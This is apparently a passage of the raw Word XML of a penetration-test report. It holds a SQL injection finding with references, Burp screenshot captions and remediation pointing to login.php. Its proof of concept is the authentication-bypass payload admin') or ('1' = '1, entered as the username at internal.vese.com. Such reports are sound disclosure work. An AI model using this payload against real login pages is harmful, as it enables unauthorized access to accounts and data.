      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="205733AA" w14:textId="77777777" w:rsidTr="00FA5639">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1FDC72C7" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25E5317D" w14:textId="73C874BE" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/attacks/SQL_Injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203C7342" w14:textId="6C33A17F" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/sql-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="672C0F63" w14:textId="13C76460" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL Injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.php</w:t>
              </w:r>
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>net/manual/en/security.database.sql-injection.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C65CD69" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78860803" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E8F4B" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00027997">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin') or ('1' = '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE573F" w14:textId="5557AD49" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This input should be supplied into the username input on the website “</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal.vese.com</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”. A request and response can be seen in the following screenshots taken from Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC12049" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1705630D" wp14:editId="0D8B374B">
            <wp:extent cx="3108960" cy="1908175"/>
            <wp:effectExtent l="19050" t="19050" r="15240"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3" r="71067"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3154994" cy="1936429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FB891" w14:textId="5D69BB37" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Request to the vulnerable endpoint with an URL-encoded payload in the request body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41CB2B" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15684FDC" w14:textId="76AE604F" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00FA5639" w:rsidP="00F21847">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AB1A85E" wp14:editId="6B6EF0CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1166224</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1187997</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2679774" cy="158566"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Rechteck 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2679774" cy="158566"/>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9BB8C" id="Rechteck 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:91.85pt;margin-top:93.55pt;width:211pt;height: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" filled="f" strokecolor="#ed7d31 [3205]" strokeweight="1pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF4B7FE" wp14:editId="527C0C87">
            <wp:extent cx="3108960" cy="1908175"/>
            <wp:effectExtent l="19050" t="19050" r="1524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0089" r="20885"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3154994" cy="1936429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11552816" w14:textId="3CEA806A" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maliciuos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">request </w:t>
      </w:r>
      <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirecting the user the logged in site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008EC12" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00F21847">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A95E4F9" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="45E6E635" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="637E2389" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79261B01" w14:textId="17BA6E7C" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IT Team</w:t>
            </w:r>
            <w:r w:rsidR="00832F07" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00832F07" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp; </w:t>
            </w:r>
            <w:r w:rsidR="00832F07" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidR="00832F07" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>evelopment team of the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="4B763D47" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="691C4AE9" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="751777A2" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00832F07" w:rsidP="000F6F1C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerabilities can be found in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> file. In line 28 the vulnerable query is initialized and in line 29 it is filled with the user provided data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235E5416" w14:textId="2D31DA82" w:rsidR="00832F07" w:rsidRPr="00832F07" w:rsidRDefault="00832F07" w:rsidP="00832F0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ACB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>sqlQuery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="5FB4B4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00832F07">
              <w:rPr>
